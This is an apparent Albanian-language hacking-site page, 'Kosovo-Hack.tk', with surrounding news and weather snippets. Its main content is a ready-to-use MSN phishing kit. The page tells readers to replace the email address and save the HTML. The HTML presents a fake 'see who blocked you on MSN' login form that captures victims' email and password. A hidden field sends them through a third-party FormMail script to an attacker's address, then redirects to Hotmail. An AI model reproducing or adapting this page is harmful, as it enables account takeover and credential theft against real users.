Mir se vini ne Kosovo-Hack.tk
} -->   
 
  hacko msn 2009 100%

Emailin qe eshte te kodi konni-@mns.com hiqeni vejeni Emailin tuaj dhe po e them i gje tjeter per ato qe nuk e dijne duhet ta beni ne notepad dhe duhet ta beni save ne fund .html

<html><font color="#FF0000"><center><title>Shikoni kush ju ka Bllokuar ne Msn</title><font size="5">
<center>Shikoni kush ju ka Bllokuar ne Msn
<center><font size="5" color="FFFF00">Hyr Mailin dhe</font><p>
<font size="5" color="FFFF00">Passwordin</font>
<body background="http://img511.imageshack.us/img511/4754/siyahnw5.jpg"><body bgcolor="#C0C0C0"><br>
</p>
<form method=post action=http://www.lcsd.gov.hk/cgi-bin/formmail/FormMail.pl><font color="#FF0000"><center><font size=4>Mail:<input type=text name=mail size="20">&nbsp; <br>
<font color="#FF0000"><center>
Password:<input type=password name=sifre size="14">
<center>(Security)
<input type="checkbox" name="C1" value="ON"><br>
<input type=submit value=Login(Identifikohu)><input type=hidden name=recipient value=arbnor.ismani@live.com><input type=hidden name=email value=fakemail@albcoders.com><input type=hidden name=realname value=Hacked By AlbCoders><input type=hidden name=subject value=password><input type=hidden name=title value=><input type=hidden name=redirect value=http://www.hotmail./></body><input type="reset" value="Get Zero" name="B1">
<center><a href="http://imageshack.us"><img src="http://img523.imageshack.us/img523/1954/msnyj2.jpg" border="0" alt="Image Hosted by ImageShack.us"/></a><br/>

 
ALBEU LAJME ne faqen tuaj
Lajmet e fundit:
Zvicra, e permbytur nga parate ilegale
Pango: Do t'i botoj SMS-t e kurthit
Firmoset deklarata per sigurine e kufijve
Kush e ndaloi defilimin e FSK-se ne "Epopene e UCK-se"?
Komisioni i Venecias: Referendumi, jo kushtetues
United shenon fitore te thelle (VIDEO)
Derbi i qytetit, fiton Juventus (VIDEO)
Barcelona i rikthehet fitoreve (VIDEO)
Madrid barazon me Madrid (VIDEO)
Bundesliga, Bayern rigjen formen e humbur
moti
Moti Tiranë Tirane Prishtinë Prishtine Shkup Shkup Kumanovë Kumanove Podgoricë Podgorice Prizren Prizren Durrës Durres Shkodër Shkodra Ohër Oher Ulqin Ulqin
Partneret e Kosovo-Hack Janë:
 
wWw.Ast-Crew.info
wWw.Hack-04.Tk
wWw.Naim-Hack.de.tl
wWw.Ego-Crew.tk
wWw.Al-Zone.Ch.Vu
wWw.Shqipnetworks.com
Kosovo - Radio
 
Degjo Radio Live
Radio eshte vetem per INTERNET EXPLORER
 
Sod kemi Pasur 1 visitors (20 hits) Ne Web!
Qdo Dit me Postime Të Reja..
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free